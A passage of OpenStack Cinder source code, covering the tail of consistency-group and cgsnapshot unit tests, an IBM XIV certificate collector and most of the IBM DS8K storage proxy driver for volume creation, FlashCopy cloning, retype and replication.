autospec=True, return_value=({'status': 'available'}, [])) @mock.patch('cinder.volume.driver.VolumeDriver.delete_cgsnapshot', autospec=True, return_value=({'status': 'deleted'}, [])) def test_create_delete_cgsnapshot(self, host, cluster, mock_del_cgsnap, mock_create_cgsnap, mock_del_cg, _mock_create_cg, mock_notify): """Test cgsnapshot can be created and deleted.""" self.volume.cluster = cluster group = tests_utils.create_consistencygroup( self.context, host=host, cluster_name=cluster, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2') self.volume_params['host'] = host volume = tests_utils.create_volume( self.context, cluster_name=cluster, consistencygroup_id=group.id, **self.volume_params) self.volume.create_volume(self.context, volume) self.assert_notify_called(mock_notify, (['INFO', 'volume.create.start'], ['INFO', 'volume.create.end'])) cgsnapshot_returns = self._create_cgsnapshot(group.id, [volume.id]) cgsnapshot = cgsnapshot_returns[0] self.volume.create_cgsnapshot(self.context, cgsnapshot) self.assertEqual(cgsnapshot.id, objects.CGSnapshot.get_by_id( context.get_admin_context(), cgsnapshot.id).id) self.assert_notify_called(mock_notify, (['INFO', 'volume.create.start'], ['INFO', 'volume.create.end'], ['INFO', 'cgsnapshot.create.start'], ['INFO', 'snapshot.create.start'], ['INFO', 'cgsnapshot.create.end'], ['INFO', 'snapshot.create.end'])) self.volume.delete_cgsnapshot(self.context, cgsnapshot) self.assert_notify_called(mock_notify, (['INFO', 'volume.create.start'], ['INFO', 'volume.create.end'], ['INFO', 'cgsnapshot.create.start'], ['INFO', 'snapshot.create.start'], ['INFO', 'cgsnapshot.create.end'], ['INFO', 'snapshot.create.end'], ['INFO', 'cgsnapshot.delete.start'], ['INFO', 'snapshot.delete.start'], ['INFO', 'cgsnapshot.delete.end'], ['INFO', 'snapshot.delete.end'])) cgsnap = objects.CGSnapshot.get_by_id( context.get_admin_context(read_deleted='yes'), cgsnapshot.id) self.assertEqual('deleted', cgsnap.status) self.assertRaises(exception.NotFound, objects.CGSnapshot.get_by_id, self.context, cgsnapshot.id) self.volume.delete_consistencygroup(self.context, group) self.assertTrue(mock_create_cgsnap.called) self.assertTrue(mock_del_cgsnap.called) self.assertTrue(mock_del_cg.called) @mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup', return_value={'status': 'available'}) @mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup', return_value=({'status': 'deleted'}, [])) def test_delete_consistencygroup_correct_host(self, mock_del_cg, _mock_create_cg): """Test consistencygroup can be deleted. Test consistencygroup can be deleted when volumes are on the correct volume node. """ group = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2') volume = tests_utils.create_volume( self.context, consistencygroup_id=group.id, host='host1@backend1#pool1', status='creating', size=1) self.volume.host = 'host1@backend1' self.volume.create_volume(self.context, volume) self.volume.delete_consistencygroup(self.context, group) cg = objects.ConsistencyGroup.get_by_id( context.get_admin_context(read_deleted='yes'), group.id) self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status) self.assertRaises(exception.NotFound, objects.ConsistencyGroup.get_by_id, self.context, group.id) self.assertTrue(mock_del_cg.called) @mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup', mock.Mock(return_value={'status': 'available'})) @mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup', return_value=({'status': 'deleted'}, [])) def test_delete_consistencygroup_cluster(self, mock_del_cg): """Test consistencygroup can be deleted. Test consistencygroup can be deleted when volumes are on the correct volume node. """ cluster_name = 'cluster@backend1' self.volume.host = 'host2@backend1' self.volume.cluster = cluster_name group = tests_utils.create_consistencygroup( self.context, host=CONF.host + 'fake', cluster_name=cluster_name, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2') volume = tests_utils.create_volume( self.context, consistencygroup_id=group.id, host='host1@backend1#pool1', cluster_name=cluster_name, status='creating', size=1) self.volume.create_volume(self.context, volume) self.volume.delete_consistencygroup(self.context, group) cg = objects.ConsistencyGroup.get_by_id( context.get_admin_context(read_deleted='yes'), group.id) self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status) self.assertRaises(exception.NotFound, objects.ConsistencyGroup.get_by_id, self.context, group.id) self.assertTrue(mock_del_cg.called) @mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup', return_value={'status': 'available'}) def test_delete_consistencygroup_wrong_host(self, *_mock_create_cg): """Test consistencygroup cannot be deleted. Test consistencygroup cannot be deleted when volumes in the group are not local to the volume node. """ group = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2') volume = tests_utils.create_volume( self.context, consistencygroup_id=group.id, host='host1@backend1#pool1', status='creating', size=1) self.volume.host = 'host1@backend2' self.volume.create_volume(self.context, volume) self.assertRaises(exception.Invalid, self.volume.delete_consistencygroup, self.context, group) cg = objects.ConsistencyGroup.get_by_id(self.context, group.id) # Group is not deleted self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg.status) def test_create_volume_with_consistencygroup_invalid_type(self): """Test volume creation with ConsistencyGroup & invalid volume type.""" vol_type = db.volume_type_create( context.get_admin_context(), dict(name=conf_fixture.def_vol_type, extra_specs={}) ) vol_type = objects.VolumeType.get_by_id(self.context, vol_type.id) cg = objects.ConsistencyGroup(self.context, id=fake.CONSISTENCY_GROUP_ID, name='cg1', volume_type_id=vol_type.id) fake_type = fake_volume.fake_volume_type_obj( self.context, id=fake.VOLUME_TYPE_ID, name='fake') vol_api = cinder.volume.api.API() # Volume type must be provided when creating a volume in a # consistency group. self.assertRaises(exception.InvalidInput, vol_api.create, self.context, 1, 'vol1', 'volume 1', consistencygroup=cg) # Volume type must be valid. self.assertRaises(exception.InvalidInput, vol_api.create, self.context, 1, 'vol1', 'volume 1', volume_type=fake_type, consistencygroup=cg) @mock.patch('cinder.volume.driver.VolumeDriver.create_cgsnapshot', autospec=True, return_value=({'status': 'available'}, [])) def test_create_cgsnapshot_with_bootable_volumes(self, mock_create_cgsnap): """Test cgsnapshot can be created and deleted.""" group = tests_utils.create_consistencygroup( self.context, availability_zone=CONF.storage_availability_zone, volume_type='type1,type2') volume = tests_utils.create_volume( self.context, consistencygroup_id=group.id, **self.volume_params) self.volume.create_volume(self.context, volume) # Create a bootable volume bootable_vol_params = {'status': 'creating', 'host': CONF.host, 'size': 1, 'bootable': True} bootable_vol = tests_utils.create_volume(self.context, consistencygroup_id=group.id, **bootable_vol_params) # Create a common volume self.volume.create_volume(self.context, bootable_vol) volume_ids = [volume.id, bootable_vol.id] cgsnapshot_returns = self._create_cgsnapshot(group.id, volume_ids) cgsnapshot = cgsnapshot_returns[0] self.volume.create_cgsnapshot(self.context, cgsnapshot) self.assertEqual(cgsnapshot.id, objects.CGSnapshot.get_by_id( context.get_admin_context(), cgsnapshot.id).id) self.assertTrue(mock_create_cgsnap.called) ``` #### File: ibm/ibm_storage/certificate.py ```python import os import tempfile from oslo_log import log as logging from cinder.i18n import _LE LOG = logging.getLogger(__name__) class CertificateCollector(object): def __init__(self, paths=None): self.paths_checked = [ '/etc/ssl/certs', '/etc/ssl/certs/xiv', '/etc/pki', '/etc/pki/xiv'] if paths: self.paths_checked.extend(paths) self.paths_checked = set(self.paths_checked) self.tmp_fd = None self.tmp_path = None def collect_certificate(self): self.tmp_fd, self.tmp_path = tempfile.mkstemp() for path in self.paths_checked: if os.path.exists(path) and os.path.isdir(path): dir_contents = os.listdir(path) for f in dir_contents: full_path = os.path.join(path, f) if (os.path.isfile(full_path) and f.startswith('XIV') and f.endswith('.pem')): try: cert_file = open(full_path, 'r') os.write(self.tmp_fd, cert_file.read()) cert_file.close() except Exception: LOG.exception(_LE("Failed to process certificate")) os.close(self.tmp_fd) fsize = os.path.getsize(self.tmp_path) if fsize > 0: return self.tmp_path else: return None def free_certificate(self): if self.tmp_path: try: os.remove(self.tmp_path) except Exception: pass self.tmp_path = None ``` #### File: ibm/ibm_storage/ds8k_proxy.py ```python import ast import json import six from oslo_config import cfg from oslo_log import log as logging from cinder import exception from cinder.i18n import _, _LI, _LW, _LE from cinder.objects import fields from cinder.utils import synchronized import cinder.volume.drivers.ibm.ibm_storage as storage from cinder.volume.drivers.ibm.ibm_storage import ds8k_helper as helper from cinder.volume.drivers.ibm.ibm_storage \ import ds8k_replication as replication from cinder.volume.drivers.ibm.ibm_storage import ds8k_restclient as restclient from cinder.volume.drivers.ibm.ibm_storage import proxy from cinder.volume.drivers.ibm.ibm_storage import strings from cinder.volume import group_types from cinder.volume import volume_types LOG = logging.getLogger(__name__) VALID_OS400_VOLUME_TYPES = { 'A01': 8, 'A02': 17, 'A04': 66, 'A05': 33, 'A06': 132, 'A07': 263, 'A81': 8, 'A82': 17, 'A84': 66, 'A85': 33, 'A86': 132, 'A87': 263, '050': '', '099': '' } EXTRA_SPECS_DEFAULTS = { 'thin': True, 'replication_enabled': False, 'consistency': False, 'os400': '', 'consistent_group_replication_enabled': False, 'group_replication_enabled': False, 'consistent_group_snapshot_enabled': False, } ds8k_opts = [ cfg.StrOpt( 'ds8k_devadd_unitadd_mapping', default='', help='Mapping between IODevice address and unit address.'), cfg.StrOpt( 'ds8k_ssid_prefix', default='FF', help='Set the first two digits of SSID'), cfg.StrOpt( 'ds8k_host_type', default='auto', help='Set to zLinux if your OpenStack version is prior to ' 'Liberty and you\'re connecting to zLinux systems. ' 'Otherwise set to auto. Valid values for this parameter ' 'are: %s.' % six.text_type(helper.VALID_HOST_TYPES)[1:-1]) ] CONF = cfg.CONF CONF.register_opts(ds8k_opts) class Lun(object): """provide volume information for driver from volume db object.""" class FakeLun(object): def __init__(self, lun, **overrides): self.size = lun.size self.os_id = 'fake_os_id' self.cinder_name = lun.cinder_name self.is_snapshot = lun.is_snapshot self.ds_name = lun.ds_name self.ds_id = None self.type_thin = lun.type_thin self.type_os400 = lun.type_os400 self.data_type = lun.data_type self.type_replication = lun.type_replication if not self.is_snapshot and self.type_replication: self.replica_ds_name = lun.replica_ds_name self.replication_driver_data = lun.replication_driver_data self.replication_status = lun.replication_status self.lss_pair = lun.lss_pair def update_volume(self, lun): volume_update = lun.get_volume_update() volume_update['provider_location'] = six.text_type({ 'vol_hex_id': self.ds_id}) volume_update['metadata']['vol_hex_id'] = self.ds_id return volume_update def __init__(self, volume, is_snapshot=False): volume_type_id = volume.get('volume_type_id') self.specs = volume_types.get_volume_type_extra_specs( volume_type_id) if volume_type_id else {} os400 = self.specs.get( 'drivers:os400', EXTRA_SPECS_DEFAULTS['os400'] ).strip().upper() self.type_thin = self.specs.get( 'drivers:thin_provision', '%s' % EXTRA_SPECS_DEFAULTS['thin'] ).upper() == 'True'.upper() self.type_replication = self.specs.get( 'replication_enabled', '<is> %s' % EXTRA_SPECS_DEFAULTS['replication_enabled'] ).upper() == strings.METADATA_IS_TRUE if volume.provider_location: provider_location = ast.literal_eval(volume.provider_location) self.ds_id = provider_location[six.text_type('vol_hex_id')] else: self.ds_id = None self.cinder_name = volume.display_name self.lss_pair = {} self.is_snapshot = is_snapshot if self.is_snapshot: self.size = volume.volume_size # ds8k supports at most 16 chars self.ds_name = ( "OS%s:%s" % ('snap', helper.filter_alnum(self.cinder_name)) )[:16] else: self.size = volume.size self.ds_name = ( "OS%s:%s" % ('vol', helper.filter_alnum(self.cinder_name)) )[:16] self.replica_ds_name = ( "OS%s:%s" % ('Replica', helper.filter_alnum(self.cinder_name)) )[:16] self.replication_status = volume.replication_status self.replication_driver_data = ( json.loads(volume.replication_driver_data) if volume.replication_driver_data else {}) if self.replication_driver_data: # now only support one replication target. replication_target = sorted( self.replication_driver_data.values())[0] replica_id = replication_target[six.text_type('vol_hex_id')] self.lss_pair = { 'source': (None, self.ds_id[0:2]), 'target': (None, replica_id[0:2]) } if os400: if os400 not in VALID_OS400_VOLUME_TYPES.keys(): msg = (_("The OS400 volume type provided, %s, is not " "a valid volume type.") % os400) raise restclient.APIException(data=msg) self.type_os400 = os400 if os400 not in ['050', '099']: self.size = VALID_OS400_VOLUME_TYPES[os400] else: self.type_os400 = EXTRA_SPECS_DEFAULTS['os400'] self.data_type = self._create_datatype(self.type_os400) self.os_id = volume.id self.status = volume.status self.volume = volume def _get_volume_metadata(self, volume): if 'volume_metadata' in volume: metadata = volume.volume_metadata return {m['key']: m['value'] for m in metadata} if 'metadata' in volume: return volume.metadata return {} def _get_snapshot_metadata(self, snapshot): if 'snapshot_metadata' in snapshot: metadata = snapshot.snapshot_metadata return {m['key']: m['value'] for m in metadata} if 'metadata' in snapshot: return snapshot.metadata return {} def shallow_copy(self, **overrides): return Lun.FakeLun(self, **overrides) def _create_datatype(self, t): if t[0:2] == 'A0': datatype = t + ' FB 520P' elif t[0:2] == 'A8': datatype = t + ' FB 520U' elif t == '050': datatype = t + ' FB 520UV' elif t == '099': datatype = t + ' FB 520PV' else: datatype = None return datatype # Note: updating metadata in vol related funcs deletes all prior metadata def get_volume_update(self): volume_update = {} volume_update['provider_location'] = six.text_type( {'vol_hex_id': self.ds_id}) # update metadata if self.is_snapshot: metadata = self._get_snapshot_metadata(self.volume) else: metadata = self._get_volume_metadata(self.volume) if self.type_replication: metadata['replication'] = six.text_type( self.replication_driver_data) else: metadata.pop('replication', None) volume_update['replication_driver_data'] = json.dumps( self.replication_driver_data) volume_update['replication_status'] = self.replication_status metadata['data_type'] = (self.data_type if self.data_type else metadata['data_type']) metadata['vol_hex_id'] = self.ds_id volume_update['metadata'] = metadata # need to update volume size for OS400 if self.type_os400: volume_update['size'] = self.size return volume_update class Group(object): """provide group information for driver from group db object.""" def __init__(self, group): gid = group.get('group_type_id') specs = group_types.get_group_type_specs(gid) if gid else {} self.type_cg_snapshot = specs.get( 'consistent_group_snapshot_enabled', '<is> %s' % EXTRA_SPECS_DEFAULTS['consistent_group_snapshot_enabled'] ).upper() == strings.METADATA_IS_TRUE class DS8KProxy(proxy.IBMStorageProxy): prefix = "[IBM DS8K STORAGE]:" def __init__(self, storage_info, logger, exception, driver, active_backend_id=None, HTTPConnectorObject=None): proxy.IBMStorageProxy.__init__( self, storage_info, logger, exception, driver, active_backend_id) self._helper = None self._replication = None self._connector_obj = HTTPConnectorObject self._replication_enabled = False self._active_backend_id = active_backend_id self.configuration = driver.configuration self.configuration.append_config_values(ds8k_opts) @proxy._trace_time def setup(self, ctxt): LOG.info(_LI("Initiating connection to IBM DS8K storage system.")) connection_type = self.configuration.safe_get('connection_type') replication_devices = self.configuration.safe_get('replication_device') if connection_type == storage.XIV_CONNECTION_TYPE_FC: if not replication_devices: self._helper = helper.DS8KCommonHelper(self.configuration, self._connector_obj) else: self._helper = ( helper.DS8KReplicationSourceHelper(self.configuration, self._connector_obj)) elif connection_type == storage.XIV_CONNECTION_TYPE_FC_ECKD: self._helper = helper.DS8KECKDHelper(self.configuration, self._connector_obj) else: err = (_("Param [connection_type] %s is invalid.") % connection_type) raise exception.InvalidParameterValue(err=err) if replication_devices: self._do_replication_setup(replication_devices, self._helper) @proxy.logger def _do_replication_setup(self, devices, src_helper): if len(devices) >= 2: err = _("Param [replication_device] is invalid, Driver " "support only one replication target.") raise exception.InvalidParameterValue(err=err) self._replication = replication.Replication(src_helper, devices[0]) self._replication.check_physical_links() self._replication.check_connection_type() if self._active_backend_id: self._switch_backend_connection(self._active_backend_id) self._replication_enabled = True @proxy.logger def _switch_backend_connection(self, backend_id, repl_luns=None): repl_luns = self._replication.switch_source_and_target(backend_id, repl_luns) self._helper = self._replication._source_helper return repl_luns @staticmethod def _b2gb(b): return b // (2 ** 30) @proxy._trace_time def _update_stats(self): if self._helper: storage_pools = self._helper.get_pools() if not len(storage_pools): msg = _('No pools found - make sure san_clustername ' 'is defined in the config file and that the ' 'pools exist on the storage.') LOG.error(msg) raise exception.CinderException(message=msg) else: msg = (_('Backend %s is not initialized.') % self.configuration.volume_backend_name) raise exception.CinderException(data=msg) stats = { "volume_backend_name": self.configuration.volume_backend_name, "serial_number": self._helper.backend['storage_unit'], "extent_pools": self._helper.backend['pools_str'], "vendor_name": 'IBM', "driver_version": self.full_version, "storage_protocol": self._helper.get_connection_type(), "total_capacity_gb": self._b2gb( sum(p['cap'] for p in storage_pools.values())), "free_capacity_gb": self._b2gb( sum(p['capavail'] for p in storage_pools.values())), "reserved_percentage": self.configuration.reserved_percentage, "consistencygroup_support": True, "consistent_group_snapshot_enabled": True, "multiattach": False } if self._replication_enabled: stats['replication_enabled'] = self._replication_enabled self.meta['stat'] = stats def _assert(self, assert_condition, exception_message=''): if not assert_condition: LOG.error(exception_message) raise restclient.APIException(data=exception_message) @proxy.logger def _create_lun_helper(self, lun, pool=None, find_new_pid=True): # DS8K supports ECKD ESE volume from 8.1 connection_type = self._helper.get_connection_type() if connection_type == storage.XIV_CONNECTION_TYPE_FC_ECKD: thin_provision = self._helper.get_thin_provision() if lun.type_thin and thin_provision: if lun.type_replication: msg = _("The primary or the secondary storage " "can not support ECKD ESE volume.") else: msg = _("Backend can not support ECKD ESE volume.") LOG.error(msg) raise restclient.APIException(message=msg) # There is a time gap between find available LSS slot and # lun actually occupies it. excluded_lss = [] while True: try: if lun.type_replication and not lun.is_snapshot: lun.lss_pair = self._replication.find_available_lss_pair( excluded_lss) else: lun.lss_pair['source'] = self._helper.find_available_lss( pool, find_new_pid, excluded_lss) return self._helper.create_lun(lun) except restclient.LssFullException: msg = _LW("LSS %s is full, find another one.") LOG.warning(msg, lun.lss_pair['source'][1]) excluded_lss.append(lun.lss_pair['source'][1]) @proxy.logger def _clone_lun(self, src_lun, tgt_lun): self._assert(src_lun.size <= tgt_lun.size, _('Target volume should be bigger or equal ' 'to the Source volume in size.')) self._ensure_vol_not_fc_target(src_lun.ds_id) # volume ID of src_lun and tgt_lun will be the same one if tgt_lun is # image-volume, because _clone_image_volume in manager.py does not pop # the provider_location. if (tgt_lun.ds_id is None) or (src_lun.ds_id == tgt_lun.ds_id): # It is a preferred practice to locate the FlashCopy target # volume on the same DS8000 server as the FlashCopy source volume. pool = self._helper.get_pool(src_lun.ds_id[0:2]) # flashcopy to larger target only works with thick vols, so we # emulate for thin by extending after copy if tgt_lun.type_thin and tgt_lun.size > src_lun.size: tmp_size = tgt_lun.size tgt_lun.size = src_lun.size self._create_lun_helper(tgt_lun, pool) tgt_lun.size = tmp_size else: self._create_lun_helper(tgt_lun, pool) else: self._assert( src_lun.size == tgt_lun.size, _('When target volume is pre-created, it must be equal ' 'in size to source volume.')) finished = False try: vol_pairs = [{ "source_volume": src_lun.ds_id, "target_volume": tgt_lun.ds_id }] self._helper.start_flashcopy(vol_pairs) fc_finished = self._helper.wait_flashcopy_finished( [src_lun], [tgt_lun]) if (fc_finished and tgt_lun.type_thin and tgt_lun.size > src_lun.size): param = { 'cap': self._helper._gb2b(tgt_lun.size), 'captype': 'bytes' } self._helper.change_lun(tgt_lun.ds_id, param) finished = fc_finished finally: if not finished: self._helper.delete_lun(tgt_lun) return tgt_lun def _ensure_vol_not_fc_target(self, vol_hex_id): for cp in self._helper.get_flashcopy(vol_hex_id): if cp['targetvolume']['id'] == vol_hex_id: msg = (_('Volume %s is currently a target of another ' 'FlashCopy operation') % vol_hex_id) raise restclient.APIException(data=msg) @proxy._trace_time def create_volume(self, volume): lun = self._create_lun_helper(Lun(volume)) if lun.type_replication: lun = self._replication.create_replica(lun) return lun.get_volume_update() @proxy._trace_time def create_cloned_volume(self, target_vol, source_vol): lun = self._clone_lun(Lun(source_vol), Lun(target_vol)) if lun.type_replication: lun = self._replication.create_replica(lun) return lun.get_volume_update() @proxy._trace_time def create_volume_from_snapshot(self, volume, snapshot): lun = self._clone_lun(Lun(snapshot, is_snapshot=True), Lun(volume)) if lun.type_replication: lun = self._replication.create_replica(lun) return lun.get_volume_update() @proxy._trace_time def extend_volume(self, volume, new_size): lun = Lun(volume) param = { 'cap': self._helper._gb2b(new_size), 'captype': 'bytes' } if lun.type_replication: if not self._active_backend_id: self._replication.delete_pprc_pairs(lun) self._helper.change_lun(lun.ds_id, param) self._replication.extend_replica(lun, param) self._replication.create_pprc_pairs(lun) else: msg = (_("The volume %s has been failed over, it is " "not suggested to extend it.") % lun.ds_id) raise exception.CinderException(data=msg) else: self._helper.change_lun(lun.ds_id, param) @proxy._trace_time def volume_exists(self, volume): return self._helper.lun_exists(Lun(volume).ds_id) @proxy._trace_time def delete_volume(self, volume): lun = Lun(volume) if lun.type_replication: lun = self._replication.delete_replica(lun) self._helper.delete_lun(lun) @proxy._trace_time def create_snapshot(self, snapshot): return self._clone_lun(Lun(snapshot['volume']), Lun( snapshot, is_snapshot=True)).get_volume_update() @proxy._trace_time def delete_snapshot(self, snapshot): self._helper.delete_lun(Lun(snapshot, is_snapshot=True)) @proxy._trace_time def migrate_volume(self, ctxt, volume, backend): # this and retype is a complete mess, pending cinder changes for fix. # currently this is only for migrating between pools on the same # physical machine but different cinder.conf backends. # volume not allowed to get here if cg or repl # should probably check volume['status'] in ['available', 'in-use'], # especially for flashcopy stats = self.meta['stat'] if backend['capabilities']['vendor_name'] != stats['vendor_name']: raise exception.VolumeDriverException(_( 'source and destination vendors differ.')) if backend['capabilities']['serial_number'] != stats['serial_number']: raise exception.VolumeDriverException(_( 'source and destination serial numbers differ.')) new_pools = self._helper.get_pools( backend['capabilities']['extent_pools']) lun = Lun(volume) cur_pool_id = self._helper.get_lun(lun.ds_id)['pool']['id'] cur_node = self._helper.get_storage_pools()[cur_pool_id]['node'] # try pools in same rank for pid, pool in new_pools.items(): if pool['node'] == cur_node: try: self._helper.change_lun(lun.ds_id, {'pool': pid}) return (True, None) except Exception: pass # try pools in opposite rank for pid, pool in new_pools.items(): if pool['node'] != cur_node: try: new_lun = lun.shallow_copy() self._create_lun_helper(new_lun, pid, False) lun.data_type = new_lun.data_type self._clone_lun(lun, new_lun) volume_update = new_lun.update_volume(lun) try: self._helper.delete_lun(lun) except Exception: pass return (True, volume_update) except Exception: # will ignore missing ds_id if failed create volume self._helper.delete_lun(new_lun) return (False, None) @proxy._trace_time def retype(self, ctxt, volume, new_type, diff, host): """retype the volume. :param ctxt: Context :param volume: A dictionary describing the volume to migrate :param new_type: A dictionary describing the volume type to convert to :param diff: A dictionary with the difference between the two types :param host: A dictionary describing the host to migrate to, where host['host'] is its name, and host['capabilities'] is a dictionary of its reported capabilities. """ def _get_volume_type(key, value): extra_specs = diff.get('extra_specs') specific_type = extra_specs.get(key) if extra_specs else None if specific_type: old_type = (True if str(specific_type[0]).upper() == value else False) new_type = (True if str(specific_type[1]).upper() == value else False) else: old_type = None new_type = None return old_type, new_type def _convert_thin_and_thick(lun, new_type): new_lun = lun.shallow_copy() new_lun.type_thin = new_type self._create_lun_helper(new_lun) self._clone_lun(lun, new_lun) try: self._helper.delete_lun(lun) except Exception: pass lun.ds_id = new_lun.ds_id lun.data_type = new_lun.data_type lun.type_thin = new_type return lun lun = Lun(volume) # check thin or thick old_type_thin, new_type_thin = _get_volume_type( 'drivers:thin_provision', 'True'.upper()) # check replication capability old_type_replication, new_type_replication = _get_volume_type( 'replication_enabled', strings.METADATA_IS_TRUE) # start retype if old_type_thin != new_type_thin: if old_type_replication: if not new_type_replication: lun = self._replication.delete_replica(lun) lun = _convert_thin_and_thick(lun, new_type_thin) else: msg = (_("The volume %s is in replication relationship, " "it is not supported to retype from thin to " "thick or vice versus.") % lun.ds_id) raise exception.CinderException(msg) else: lun = _convert_thin_and_thick(lun, new_type_thin) if new_type_replication: lun.type_replication = True lun = self._replication.enable_replication(lun) else: if not old_type_replication and new_type_replication: lun.type_replication = True lun = self._replication.enable_replication(lun) elif old_type_replication and not new_type_replication: lun = self._replication.delete_replica(lun) lun.type_replication = False return True, lun.get_volume_update() @synchronized('OpenStackCinderIBMDS8KMutexConnect-', external=True) @proxy._trace_time @proxy.logger def initialize_connection(self, volume, connector, **kwargs): """Attach a volume to the host.""" vol_id = Lun(volume).ds_id LOG.info(_LI('Attach the volume %s.'), vol_id) return self._helper.initialize_connection(vol_id, connector, **kwargs) @synchronized('OpenStackCinderIBMDS8KMutexConnect-', external=True) @proxy._trace_time @proxy.logger def terminate_connection(self, volume, connector, force=False, **kwargs): """Detach a volume from a host.""" vol_id = Lun(volume).ds_id LOG.info(_LI('Detach the volume %s.'), vol_id) return self._helper.terminate_connection(vol_id, connector, force, **kwargs) @proxy.logger def create_consistencygroup(self, ctxt, group): """Create a consistency group.""" return self._helper.create_group(ctxt, group) @proxy.logger def delete_consistencygroup(self, ctxt, group, volumes): """Delete a consistency group.""" luns = [Lun(volume) for volume in volumes] return self._helper.delete_group(ctxt, group, luns) @proxy._trace_time def create_cgsnapshot(self, ctxt, cgsnapshot, snapshots): """Create a consistency group snapshot.""" return self._create_group_snapshot(ctxt, cgsnapshot, snapshots, True) def _create_group_snapshot(self, ctxt, cgsnapshot, snapshots, cg_enabled=False): snapshots_model_update = [] model_update = {'status': fields.GroupStatus.AVAILABLE} src_luns = [Lun(snapshot['volume']) for snapshot in snapshots] tgt_luns = [Lun(snapshot, is_snapshot=True) for snapshot in snapshots] try: if src_luns and tgt_luns: self._clone_group(src_luns, tgt_luns, cg_enabled) except restclient.APIException: model_update['status'] = fields.GroupStatus.ERROR LOG.exception(_LE('Failed to create group snapshot.')) for tgt_lun in tgt_luns: snapshot_model_update = tgt_lun.get_volume_update() snapshot_model_update.update({ 'id': tgt_lun.os_id, 'status': model_update['status'] }) snapshots_model_update.append(snapshot_model_update) return model_update, snapshots_model_update @proxy._trace_time @proxy.logger def delete_cgsnapshot(self, ctxt, cgsnapshot, snapshots): """Delete a consistency group snapshot.""" return self._delete_group_snapshot(ctxt, cgsnapshot, snapshots) def _delete_group_snapshot(self, ctxt, group_snapshot, snapshots): snapshots_model_update = [] model_update = {'status': fields.GroupStatus.DELETED} snapshots = [Lun(s, is_snapshot=True) for s in snapshots] if snapshots: try: self._helper.delete_lun(snapshots) except restclient.APIException as e: model_update['status'] = fields.GroupStatus.ERROR_DELETING LOG.error(_LE("Failed to delete group snapshot. " "Error: %(err)s"), {'err': e}) for snapshot in snapshots: snapshots_model_update.append({ 'id': snapshot.os_id, 'status': model_update['status'] }) return model_update, snapshots_model_update @proxy.logger def update_consistencygroup(self, ctxt, group, add_volumes, remove_volumes): """Add or remove volume(s) to/from an existing consistency group.""" return self._helper.update_group(ctxt, group, add_volumes, remove_volumes) @proxy._trace_time def create_consistencygroup_from_src(self, ctxt, group, volumes, cgsnapshot, snapshots, source_cg, sorted_source_vols): """Create a consistencygroup from source. :param ctxt: the context of the caller. :param group: the dictionary of the consistency group to be created. :param volumes: a list of volume dictionaries in the group. :param cgsnapshot: the dictionary of the cgsnapshot as source. :param snapshots: a list of snapshot dictionaries in the cgsnapshot. :param source_cg: the dictionary of the consisgroup as source. :param sorted_source_vols: a list of volume dictionaries in the consisgroup. :return model_update, volumes_model_update """ return self._create_group_from_src(ctxt, group, volumes, cgsnapshot, snapshots, source_cg, sorted_source_vols, True) def _create_group_from_src(self, ctxt, group, volumes, cgsnapshot, snapshots, source_cg, sorted_source_vols, cg_enabled=False): model_update = {'status': fields.GroupStatus.AVAILABLE} volumes_model_update = [] if cgsnapshot and snapshots: src_luns = [Lun(snapshot, is_snapshot=True) for snapshot in snapshots] elif source_cg and sorted_source_vols: src_luns = [Lun(source_vol) for source_vol in sorted_source_vols] else: msg = _("_create_group_from_src supports a group snapshot " "source or a group source, other sources can not " "be used.") LOG.error(msg) raise exception.InvalidInput(message=msg) try: tgt_luns = [Lun(volume) for volume in volumes] if src_luns and tgt_luns: self._clone_group(src_luns, tgt_luns, cg_enabled) except restclient.APIException: model_update['status'] = fields.GroupStatus.ERROR msg = _LE("Failed to create group from group snapshot.") LOG.exception(msg) for tgt_lun in tgt_luns: volume_model_update = tgt_lun.get_volume_update() volume_model_update.update({ 'id': tgt_lun.os_id, 'status': model_update['status'] }) volumes_model_update.append(volume_model_update) return model_update, volumes_model_update def _clone_group(self, src_luns, tgt_luns, cg_enabled): for src_lun in src_luns: self._ensure_vol_not_fc_target(src_lun.ds_id) finished = False try: vol_pairs = [] for src_lun, tgt_lun in zip(src_luns, tgt_luns): pool = self._helper.get_pool(src_lun.ds_id[0:2]) if tgt_lun.ds_id is None: self._create_lun_helper(tgt_lun, pool) vol_pairs.append({ "source_volume": src_lun.ds_id, "target_volume": tgt_lun.ds_id }) if cg_enabled: self._do_flashcopy_with_freeze(vol_pairs) else: self._helper.start_flashcopy(vol_pairs) finished = self._helper.wait_flashcopy_finished(src_luns, tgt_luns) finally: if not finished: self._helper.delete_lun(tgt_luns) @synchronized('OpenStackCinderIBMDS8KMutex-CG-', external=True) @proxy._trace_time def _do_flashcopy_with_freeze(self, vol_pairs): # issue flashcopy with freeze self._helper.start_flashcopy(vol_pairs, True) # unfreeze the LSS where source volumes are in lss_ids = list(set(p['source_volume'][0:2] for p in vol_pairs)) LOG.debug('Unfreezing the LSS: %s', ','.join(lss_ids)) self._helper.unfreeze_lss(lss_ids) @proxy.logger def create_group(self, ctxt, group): """Create generic volume group.""" return self._helper.create_group(ctxt, group) @proxy.logger def delete_group(self, ctxt, group, volumes): """Delete group and the volumes in the group.""" luns = [Lun(volume) for volume in volumes] return self._helper.delete_group(ctxt, group, luns) @proxy.logger def update_group(self, ctxt, group, add_volumes, remove_volumes): """Update generic volume group.""" return self._helper.update_group(ctxt, group, add_volumes, remove_volumes) @proxy.logger def create_group_snapshot(self, ctxt, group_snapshot, snapshots): """Create volume group snapshot.""" snapshot_group = Group(group_snapshot) cg_enabled = True if snapshot_group.type_cg_snapshot else False return self._create_group_snapshot(ctxt, group_snapshot, snapshots, cg_enabled) @proxy.logger def delete_group_snapshot(self, ctxt, group_snapshot, snapshots): """Delete volume group snapshot.""" return self._delete_group_snapshot(ctxt, group_snapshot, snapshots) @proxy._trace_time def create_group_from_src(self, ctxt, group, volumes, 